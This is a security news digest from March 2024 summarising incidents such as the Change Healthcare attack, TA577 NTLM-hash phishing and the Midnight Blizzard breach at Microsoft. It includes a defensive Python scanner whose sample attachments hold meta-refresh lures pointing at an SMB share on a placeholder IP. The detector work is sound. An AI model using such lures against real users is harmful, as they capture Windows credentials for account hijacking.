Information Security News 3-11-2024


UnitedHealth Sets Timeline to Restore Change Healthcare Systems After BlackCat Hit

Article Link: https://www.infosecurity-magazine.com/news/unitedhealth-restore-change/

  • UnitedHealth Group has published a timeline to restore Change Healthcare’s systems
  • The healthcare conglomerate, which owns Change Healthcare, said it expects key pharmacy and payment systems to be restored and available by March 18.
  • The ongoing incident was described by Rick Pollack, American Hospital Association (AHA) President and CEO, on March 5 as “the most significant and consequential incident of its kind against the US healthcare system in history.”

CISA, NSA share best practices for securing cloud services

Article Link: https://www.bleepingcomputer.com/news/security/cisa-nsa-share-best-practices-for-securing-cloud-services/

  • The NSA and the Cybersecurity and Infrastructure Security Agency (CISA) have released five joint cybersecurity bulletins containing best practices for securing a cloud environment.
  • These guides focus on identity and access management solutions, key management solutions, encrypting data in the cloud, managing cloud storage, and mitigating risks from managed service providers.
  • In 2021, Microsoft issued a report on how the Russian Nobelium threat actors were actively compromising cloud services and managed service providers in order to reach their downstream customers, including those customers’ internal networks.

MiTM phishing attack can let attackers unlock and steal a Tesla

Article Link: https://www.bleepingcomputer.com/news/security/mitm-phishing-attack-can-let-attackers-unlock-and-steal-a-tesla/

  • Researchers demonstrated how they could conduct a Man-in-the-Middle (MiTM) phishing attack to compromise Tesla accounts, unlock cars, and start them.
  • The researchers reported their findings to Tesla, saying that linking a car to a new phone lacks proper authentication security. However, the car maker determined the report to be out of scope.
  • Mysk says that adding a new Phone Key through the app does not require the car to be unlocked or the smartphone to be inside the vehicle, which makes for a significant security gap.
  • With the new Phone Key, the attacker can unlock the car and activate all its systems, allowing them to drive away as if they were the owner.

VMware fixes critical sandbox escape flaws in ESXi, Workstation, and Fusion

Article Link: https://www.bleepingcomputer.com/news/security/vmware-fixes-critical-sandbox-escape-flaws-in-esxi-workstation-and-fusion/

  • VMware released security updates to fix critical sandbox escape vulnerabilities in VMware ESXi, Workstation, Fusion, and Cloud Foundation products; the flaws allow attackers to escape a virtual machine and access the host operating system.
  • A practical workaround to mitigate CVE-2024-22252, CVE-2024-22253, and CVE-2024-22255 is to remove USB controllers from virtual machines, following the instructions provided by the vendor.
  • It is worth noting that, due to the vulnerabilities’ severity, VMware has also made security fixes available for the older ESXi versions 6.7 (6.7U3u) and 6.5 (6.5U3v), and for VCF 3.x.

Hackers steal Windows NTLM authentication hashes in phishing attacks

Article Link: https://www.bleepingcomputer.com/news/security/hackers-steal-windows-ntlm-authentication-hashes-in-phishing-attacks/

  • The hacking group known as TA577 has recently shifted tactics by using phishing emails to steal NT LAN Manager (NTLM) authentication hashes to perform account hijacks.
  • The new campaign started with phishing emails that appear to be replies to a target’s previous discussion, a technique known as thread hijacking.
  • The emails attach unique (per victim) ZIP archives containing HTML files that use HTML META refresh tags to trigger an automatic connection to a text file on an external Server Message Block (SMB) server.
  • When the Windows device connects to that server, it automatically attempts an NTLMv2 challenge/response, allowing the remote attacker-controlled server to capture the NTLM authentication hashes.
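The detection point in this campaign is the META refresh tag itself: a legitimate attachment has no reason to redirect to an SMB share. The following scanner is an added example for this digest (not code from the article, from Proofpoint, or from BleepingComputer); it parses HTML with the standard library and flags any meta refresh whose target is a file:// or smb:// URL or a bare UNC path. The sample attachments it checks are constructed, and the IP address in them is a documentation-range placeholder, not an indicator from the campaign.

```python
"""Flag HTML attachments whose <meta http-equiv="refresh"> tag redirects to an
SMB/UNC location, the NTLM-capture pattern described above.

Added example for this news digest; the sample attachments are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# URL schemes that make a Windows host reach out over SMB instead of HTTP(S).
SMB_SCHEMES = {"file", "smb"}


class _MetaRefreshCollector(HTMLParser):
    """Collects the redirect target of every <meta http-equiv="refresh"> tag."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names; values keep their case.
        if tag != "meta":
            return
        attributes = {name: (value or "") for name, value in attrs}
        if attributes.get("http-equiv", "").strip().lower() != "refresh":
            return
        # content looks like "0; url=..."; quoting and case of "url" vary.
        match = re.search(r"url\s*=\s*['\"]?([^'\"]+)",
                          attributes.get("content", ""), re.IGNORECASE)
        if match:
            self.targets.append(match.group(1).strip())


def is_smb_target(url):
    """True when a redirect target would be resolved over SMB rather than HTTP(S).

    Covers explicit file:/smb: schemes, bare UNC paths (\\\\host\\share), and
    protocol-relative //host/share, which resolves against file: when the HTML
    is opened from disk, as an extracted attachment is."""
    if url.startswith("\\\\") or url.startswith("//"):
        return True
    return urlsplit(url).scheme.lower() in SMB_SCHEMES


def suspicious_refresh_targets(html):
    """Return every meta-refresh target in html that points at an SMB location."""
    parser = _MetaRefreshCollector()
    parser.feed(html)
    parser.close()
    return [target for target in parser.targets if is_smb_target(target)]


# Constructed sample attachments (203.0.113.5 is a documentation placeholder).
BENIGN = ('<html><head><meta http-equiv="refresh" '
          'content="5; url=https://example.com/"></head></html>')
SUSPICIOUS = ('<html><head><META HTTP-EQUIV="Refresh" '
              'CONTENT="0; URL=file://203.0.113.5/docs/note.txt"></head></html>')
UNC = '<meta http-equiv="refresh" content="0;url=\\\\203.0.113.5\\docs\\note.txt">'

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("file://", SUSPICIOUS), ("unc", UNC)):
        print(label, "->", suspicious_refresh_targets(sample))
```

Run over the three samples, only the file:// and UNC attachments are reported; the https redirect passes. In a mail gateway the same function would be applied to each HTML file extracted from an attached ZIP, with a hit treated as a quarantine condition rather than a mere score increment, since the behaviour has no benign use.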

Dropbox Used to Steal Credentials and Bypass MFA in Novel Phishing Campaign

Article Link: https://www.infosecurity-magazine.com/news/dropbox-credentials-bypass-mfa/

  • A novel phishing campaign leveraged legitimate Dropbox infrastructure and successfully bypassed multifactor authentication (MFA) protocols, new research from Darktrace has revealed.
  • The findings also show how attackers are becoming adept at evading standard security protocols, including email detection tools and MFA.
  • The researchers noted that there is “very little to distinguish” malicious or benign emails from automated emails used by legitimate services such as Dropbox. Therefore, this approach is effective in evading email security tools and convincing targets to click a malicious link.

American Express credit cards exposed in third-party data breach

Article Link: https://www.bleepingcomputer.com/news/security/american-express-credit-cards-exposed-in-third-party-data-breach/

  • American Express is warning customers that credit cards were exposed in a third-party data breach after a merchant processor was hacked.
  • This incident was not caused by a data breach at American Express, but rather at a merchant processor in which American Express Card member data was processed.
  • It is unclear how many customers were impacted, what merchant processor was breached, and when the attack occurred.

Microsoft says Russian hackers breached its systems, accessed source code

Article Link: https://www.theregister.com/2024/03/08/microsoft_confirms_russian_spies_stole/

  • Microsoft says the Russian ‘Midnight Blizzard’ hacking group recently accessed some of its internal systems and source code repositories using authentication secrets stolen during a January cyberattack.
  • While Microsoft has not explained precisely what these “secrets” include, they are likely authentication tokens, API keys, or credentials.
  • For this reason, companies must enforce MFA on all accounts so that a correctly guessed credential alone does not grant access.
